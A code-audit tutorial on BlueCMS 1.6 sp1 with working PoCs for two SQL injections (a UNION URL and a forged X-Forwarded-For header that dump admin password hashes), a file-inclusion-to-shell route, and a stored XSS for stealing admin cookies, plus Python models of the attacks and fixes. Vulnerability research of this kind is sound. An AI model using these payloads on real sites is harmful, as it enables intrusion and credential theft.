How to use bluecms audit in php

2025-01-18 Update. From: SLTechnology News&Howtos, Network Security


Shulou (Shulou.com) 05/31 Report

This article walks through a PHP code audit of BlueCMS: the audit method, the test environment, and four findings in BlueCMS 1.6 sp1 (two SQL injections, a file inclusion, and a stored XSS in user registration).

Code audit

I. Audit methods

Locate sensitive keywords, then trace each parameter back through the call chain.

Locate sensitive function points and read the function code (black box + white box):

System reinstallation

File upload

File management

Login authentication

Password recovery

Order payment

Full read-through of the code (trace and debug starting from index.php)

Tools:

Seay code audit system

RIPS

Xdebug

II. BlueCMS audit

2.0 Audit environment

PhpStudy

PHP 5.2

BlueCMS 1.6 sp1 (installation is not covered here)

Seay code audit system

2.1 ad_js.php SQL injection vulnerability

Seay's automatic audit flags a suspected SQL injection in ad_js.php.

    require_once dirname(__FILE__) . '/include/common.inc.php';

This pulls in the site's configuration file, which applies one global input filter:

    if (!get_magic_quotes_gpc()) {
        $_POST    = deep_addslashes($_POST);
        $_GET     = deep_addslashes($_GET);
        $_COOKIES = deep_addslashes($_COOKIES); // note: PHP's cookie superglobal is $_COOKIE, not $_COOKIES
        $_REQUEST = deep_addslashes($_REQUEST);
    }

So when magic_quotes_gpc is off, $_POST, $_GET and $_REQUEST get addslashes() treatment, which puts a backslash before quotes, backslashes and NUL bytes in every parameter. (The $_COOKIES line does not touch PHP's $_COOKIE superglobal, so cookie values are in fact left unescaped.)

But ad_js.php concatenates ad_id into its query as a bare number, with no surrounding quotes, so there is nothing for addslashes() to escape and the filter is bypassed.

getone() adds no filtering of its own:

    function getone($sql, $type = MYSQL_ASSOC) {
        $query = $this->query($sql, $this->linkid);
        $row   = mysql_fetch_array($query, $type);
        return $row;
    }

This is a numeric (unquoted) injection. The page echoes the query result, so a UNION SELECT is used to find which column is displayed: with seven columns, column 7 is echoed.

PoC:

    http://www.blue.com/ad_js.php?ad_id=1 union select 1,2,3,4,5,6,group_concat(concat(admin_name,0x7e,pwd)) from blue_admin--+

The separator is written as the hex literal 0x7e ('~') rather than a quoted string because a quote in the parameter would be escaped by addslashes().
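To make the bypass concrete, here is an added example (my own code, not BlueCMS's) that models the global addslashes() filter and the unquoted ad query, then runs the UNION payload against a throwaway database. The query shape is an assumption taken from the page's description (ad_id concatenated without quotes), and the seven-column blue_ad table is assumed from the page's seven-column payload. SQLite stands in for MySQL, so the MySQL expression group_concat(concat(admin_name,0x7e,pwd)) is written as group_concat(admin_name || char(126) || pwd); both forms avoid a quoted '~' that addslashes() would escape. The ad row and the admin hash are constructed sample data.

```python
"""Why addslashes() does not stop the ad_js.php injection (added example)."""
import re
import sqlite3


def php_addslashes(value: str) -> str:
    """PHP addslashes(): backslash before ' " \\ and NUL (NUL becomes \\0).
    This is what deep_addslashes() applies to $_GET in include/common.inc.php."""
    out = value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')
    return out.replace("\x00", "\\0")


def php_intval(value: str) -> int:
    """PHP intval() on a string: the leading integer, else 0."""
    m = re.match(r"\s*([+-]?\d+)", value)
    return int(m.group(1)) if m else 0


def ad_query_vulnerable(ad_id_param: str) -> str:
    """Assumed shape of the ad_js.php query: the escaped parameter lands in a
    numeric context with no surrounding quotes, so there is nothing to escape."""
    return "SELECT * FROM blue_ad WHERE ad_id=" + php_addslashes(ad_id_param)


def ad_query_fixed(ad_id_param: str) -> str:
    """Fix: cast to int (a prepared statement with a bound parameter is the
    other correct option)."""
    return "SELECT * FROM blue_ad WHERE ad_id=%d" % php_intval(ad_id_param)


def union_payload(ncols: int, echo_col: int, expr: str) -> str:
    """Build '1 union select 1,2,...' with expr placed in the column the page
    echoes (the page found that column 7 of 7 is displayed)."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[echo_col - 1] = expr
    return "1 union select " + ",".join(cols) + "-- "


# SQLite form of the page's group_concat(concat(admin_name,0x7e,pwd)).
ADMIN_EXPR = "(select group_concat(admin_name || char(126) || pwd) from blue_admin)"


def run_ad_query(ad_id_param: str) -> list:
    """Run the vulnerable query on an in-memory database seeded with one
    constructed ad row and one constructed admin row; return every row."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE blue_ad (ad_id, c2, c3, c4, c5, c6, c7);
        CREATE TABLE blue_admin (admin_name, pwd);
        INSERT INTO blue_ad VALUES (1, 'a', 'b', 'c', 'd', 'e', 'banner.js');
        INSERT INTO blue_admin VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return db.execute(ad_query_vulnerable(ad_id_param)).fetchall()


def leaked_column7(ad_id_param: str) -> list:
    """The column-7 values the page would display, one per returned row."""
    return [row[6] for row in run_ad_query(ad_id_param)]


if __name__ == "__main__":
    payload = union_payload(7, 7, ADMIN_EXPR)
    print(ad_query_vulnerable(payload))  # the payload survives addslashes() untouched
    print(leaked_column7(payload))       # contains 'admin~<hash>'
    print(ad_query_fixed(payload))       # intval() leaves only ad_id=1
```

The test for the fix is the last line: after intval() the same payload collapses to `ad_id=1`, which is the check an auditor should look for (or a bound parameter) when verifying a patch.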

2.2 comment.php SQL injection vulnerability

include/common.fun.php:

    /* get user IP */
    function getip() {
        if (getenv('HTTP_CLIENT_IP')) {
            $ip = getenv('HTTP_CLIENT_IP');
        } elseif (getenv('HTTP_X_FORWARDED_FOR')) {
            // get the real ip address when the client comes through a proxy server
            $ip = getenv('HTTP_X_FORWARDED_FOR');
        } elseif (getenv('HTTP_X_FORWARDED')) {
            $ip = getenv('HTTP_X_FORWARDED');
        } elseif (getenv('HTTP_FORWARDED_FOR')) {
            $ip = getenv('HTTP_FORWARDED_FOR');
        } elseif (getenv('HTTP_FORWARDED')) {
            $ip = getenv('HTTP_FORWARDED');
        } else {
            $ip = $_SERVER['REMOTE_ADDR'];
        }
        return $ip;
    }

The configuration file escapes $_POST, $_GET, $_COOKIES and $_REQUEST, but $_SERVER (and getenv(), which reads the same request headers) is not covered, and the site obtains the client IP from exactly those. So the IP can be forged with a Client-IP or X-Forwarded-For header, and whatever string the header carries is what getip() returns.

To find where getip() is called, search the whole project in PhpStorm (Ctrl+Shift+F).

It is called in comment.php:

    $sql = "INSERT INTO " . table('comment') . " (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check) VALUES ('', '$id', '$user_id', '$type', '$mood', '$content', '$timestamp', '" . getip() . "', '$is_check')";

$content is escaped to prevent XSS:

    $content = !empty($_POST['comment']) ? htmlspecialchars($_POST['comment']) : '';

The other parameters have been addslashes()'d by the global filter, and the numeric ones are cast with intval().

But getip() is not filtered at all, so a forged IP header gives SQL injection.

Posting a comment normally works as expected.

To see the exact statement, temporarily patch the source to print the SQL being executed and then exit.

The output shows that the forged IP is accepted as-is:

INSERT INTO blue_comment (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check) VALUES ("1", "1", "1", "1", "6", "123", "16135389", "1.1.1.1")

So we build the injection inside the forged IP. The header value closes the legitimate row and opens a second row whose content column is a subquery against the admin table; the "', '$is_check')" that comment.php appends then closes that second row.

PoC (reconstructed to match the nine-column INSERT above):

    X-Forwarded-For: 1.1.1.1', '1'), ('', '1', '1', '1', '1', (select group_concat(admin_name, ":", pwd) from blue_admin), '1613538242', '1.1.1.1

The comment is posted successfully, and the injected second comment displays the admin name and password hash: injection succeeded.
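The following is an added example (my own code, not BlueCMS's) that models this end to end: the header precedence of getip(), the nine-column INSERT from comment.php, the multi-row payload, and a hardened getip() that only trusts the transport address. An in-memory SQLite database stands in for MySQL, so the payload's string concatenation uses SQLite's || operator where the page's MySQL payload uses group_concat(admin_name, ":", pwd); the admin row and its hash are constructed sample data.

```python
"""Model of comment.php's IP handling and the header-based injection (added example)."""
import ipaddress
import sqlite3

# Same precedence as BlueCMS getip(): any of these client-controlled headers
# wins over REMOTE_ADDR, and none of them passes through deep_addslashes().
HEADER_ORDER = (
    "HTTP_CLIENT_IP",
    "HTTP_X_FORWARDED_FOR",
    "HTTP_X_FORWARDED",
    "HTTP_FORWARDED_FOR",
    "HTTP_FORWARDED",
)


def getip(env: dict) -> str:
    """The vulnerable lookup: first populated header wins, value returned raw."""
    for key in HEADER_ORDER:
        if env.get(key):
            return env[key]
    return env["REMOTE_ADDR"]


def is_valid_ip(value: str) -> bool:
    """What a hardened getip() must require before the value touches SQL."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def getip_hardened(env: dict) -> str:
    """Fix: trust only the transport address.  Behind a known reverse proxy,
    read X-Forwarded-For from that proxy alone and still validate it."""
    addr = env["REMOTE_ADDR"]
    if not is_valid_ip(addr):
        raise ValueError("REMOTE_ADDR is not an IP address")
    return addr


def build_comment_insert(env, post_id, user_id, type_, mood, content, timestamp, is_check):
    """The nine-column INSERT from comment.php.  The $_POST-derived values were
    intval()'d or addslashes()'d upstream; getip() is spliced in unescaped."""
    return (
        "INSERT INTO blue_comment (com_id, post_id, user_id, type, mood, content, "
        "pub_date, ip, is_check) VALUES ('', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s')"
        % (post_id, user_id, type_, mood, content, timestamp, getip(env), is_check)
    )


# Closes the legitimate row, opens a second row whose content column is the
# admin table, and lets the statement's own trailing "', '1')" finish it.
XFF_PAYLOAD = (
    "1.1.1.1', '1'), ('', '1', '1', '1', '1', "
    "(SELECT group_concat(admin_name || ':' || pwd) FROM blue_admin), "
    "'1613538242', '1.1.1.1"
)


def run_comment_insert(env: dict) -> list:
    """Execute the INSERT against a throwaway database seeded with one
    constructed admin row; return the stored comment bodies in insert order."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE blue_admin (admin_name TEXT, pwd TEXT);
        CREATE TABLE blue_comment (com_id, post_id, user_id, type, mood,
                                   content, pub_date, ip, is_check);
        INSERT INTO blue_admin VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    db.execute(build_comment_insert(env, 1, 1, 1, 6, "hello", 1613538242, 1))
    return [row[0] for row in db.execute("SELECT content FROM blue_comment ORDER BY rowid")]


if __name__ == "__main__":
    env = {"REMOTE_ADDR": "10.0.0.5", "HTTP_X_FORWARDED_FOR": XFF_PAYLOAD}
    print(build_comment_insert(env, 1, 1, 1, 6, "hello", 1613538242, 1))
    for body in run_comment_insert(env):
        print(body)  # the second body is admin:<hash>, readable as a comment
```

Note that the second row passes every other check the page mentions (intval() on the numeric fields, htmlspecialchars() on content) because none of them ever sees the IP value; the audit lesson is that a global input filter is only as good as the list of sources it covers, and $_SERVER/getenv() were not on that list.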

2.3 File inclusion vulnerability

user.php, around line 750:

    elseif ($act == 'pay') {
        include 'data/pay.cache.php';
        $price = $_POST['price'];
        $id    = $_POST['id'];
        $name  = $_POST['name'];
        if (empty($_POST['pay'])) {
            showmsg('Sorry, you did not choose a payment method');
        }
        include 'include/payment/' . $_POST['pay'] . "/index.php";
    }

$_POST['pay'] is not validated at all; it is concatenated straight into the include path. As noted above, $_POST has been through deep_addslashes(), so a %00 byte arrives as the two characters \0 and null-byte truncation is not possible here.

The conditions for each truncation technique:

Null-byte (%00) truncation: requires PHP < 5.3.4 and magic_quotes_gpc = Off.

Period truncation (Windows only): PHP 5.2.17 with magic_quotes_gpc = On, e.g. index.php?file=phpinfo.php.......... (in my test the total length had to exceed 269).

./ truncation: PHP 5.2.17 with magic_quotes_gpc = On, e.g. index.php?file=phpinfo.php./././././ (in my test the total length had to exceed 269).

I could not reproduce it successfully; this is probably down to the configuration of my local environment.

Once truncation works, a user can upload an avatar containing PHP code and include that file to get a shell.
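As an added example (my own code, not BlueCMS's), the block below builds the include path the way user.php does, shows why the null byte dies once addslashes() has run, and adds the whitelist check an auditor would expect in a fix. Paths are built as strings only; nothing is included. The module names "alipay" and "tenpay" in the usage are placeholders, not a claim about which payment modules BlueCMS ships.

```python
"""Include path from user.php's pay branch, null-byte escaping, and a whitelist (added example)."""
import posixpath
from typing import Optional

PAYMENT_DIR = "include/payment/"


def php_addslashes(value: str) -> str:
    """PHP addslashes(): backslash before ' " \\ and NUL (NUL becomes \\0)."""
    out = value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')
    return out.replace("\x00", "\\0")


def include_path(pay_param: str, escaped: bool) -> str:
    """include 'include/payment/' . $_POST['pay'] . '/index.php', as user.php
    does.  escaped=True models magic_quotes_gpc=On or deep_addslashes() having
    run over $_POST; escaped=False models neither being active."""
    value = php_addslashes(pay_param) if escaped else pay_param
    return PAYMENT_DIR + value + "/index.php"


def null_byte_truncates(path: str) -> bool:
    """True if a C-string file API would stop at a NUL inside the path, which
    is what '%00 truncation' relies on (PHP < 5.3.4 only)."""
    return "\x00" in path


def include_path_fixed(pay_param: str, enabled_payments: set) -> Optional[str]:
    """Whitelist the module name, then confirm the normalised path still sits
    under include/payment/ so no traversal can slip through."""
    if pay_param not in enabled_payments:
        return None
    full = posixpath.normpath(PAYMENT_DIR + pay_param + "/index.php")
    if not full.startswith(PAYMENT_DIR):
        return None
    return full


if __name__ == "__main__":
    traversal = "../../data/upload/avatar.jpg\x00"  # constructed attacker value
    print(repr(include_path(traversal, escaped=False)))  # NUL intact: '/index.php' would be cut off
    print(repr(include_path(traversal, escaped=True)))   # NUL is now '\\0': the suffix stays
    print(include_path_fixed("alipay", {"alipay", "tenpay"}))
    print(include_path_fixed(traversal, {"alipay", "tenpay"}))
```

The escaped path shows exactly what the page describes: the attacker still controls the directory part, but the mandatory `/index.php` suffix can only be removed by a path-length trick rather than by %00, so the avatar-upload route depends on the platform and PHP version the server runs.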

2.4 User registration XSS vulnerability

This time, instead of letting Seay hunt for XSS, we audit by testing the key functions. In the back end (Member Management -> Member List) the administrator views member information; if XSS can be injected into that information from the front end, the administrator's cookie can be stolen.

Go to the front-end member registration page and register a user. The user name and email are controllable; passwords are generally not worth considering.

Submit the registration and capture the request: it goes to the do_reg branch of user.php.

    elseif ($act == 'do_reg') {
        $user_name = !empty($_POST['user_name']) ? trim($_POST['user_name']) : '';
        $pwd       = !empty($_POST['pwd'])       ? trim($_POST['pwd'])       : '';
        $pwd1      = !empty($_POST['pwd1'])      ? trim($_POST['pwd1'])      : '';
        $email     = !empty($_POST['email'])     ? trim($_POST['email'])     : '';
        $safecode  = !empty($_POST['safecode'])  ? trim($_POST['safecode'])  : '';
        $from      = !empty($from) ? base64_decode($from) : 'user.php';
        if (strlen($user_name) < 4 || strlen($user_name) > 16) {
            showmsg('username length does not match');
        }
        if (strlen($pwd) < 6) {
            showmsg('the password must be at least 6 characters');
        }
        if ($pwd != $pwd1) {
            showmsg('the two passwords entered do not match');
        }
        if (strtolower($safecode) != strtolower($_SESSION['safecode'])) {
            showmsg('captcha error');
        }
        if ($db->getone("SELECT * FROM " . table('user') . " WHERE user_name='$user_name'")) {
            showmsg('the user name already exists');
        }
        if ($db->getone("SELECT * FROM " . table('admin') . " WHERE admin_name='$user_name'")) {
            showmsg('the user name already exists');
        }
        $sql = "INSERT INTO " . table('user') . " (user_id, user_name, pwd, email, reg_time, last_login_time) VALUES ('', '$user_name', md5('$pwd'), '$email', '$timestamp', '$timestamp')";
        if (!$db->query($sql)) {
            showmsg('Sorry, error in registration');
        } else {
            $_SESSION['user_id']   = $db->insert_id();
            $_SESSION['user_name'] = $user_name;
            update_user_info($_SESSION['user_name']);
            setcookie('blue[user_id]', $_SESSION['user_id'], time() + 3600, $cookiepath, $cookiedomain);
            setcookie('blue[user_name]', $user_name, time() + 3600, $cookiepath, $cookiedomain);
            setcookie('blue[user_pwd]', md5(md5($pwd) . $_CFG['cookie_hash']), time() + 3600, $cookiepath, $cookiedomain);
            if (defined('UC_API') && @include_once(BLUE_ROOT . 'uc_client/client.php')) {
                $uid = uc_user_register($user_name, $pwd, $email);
                if ($uid
                // (the listing on the page is cut off here)

The only processing the user name and email receive is trim() plus the global addslashes() escaping, which does nothing to HTML; the user name is length-checked (4 to 16 characters), the email is not. Both are stored as-is and later rendered in the member list, which is the stored XSS the back-end test is looking for.
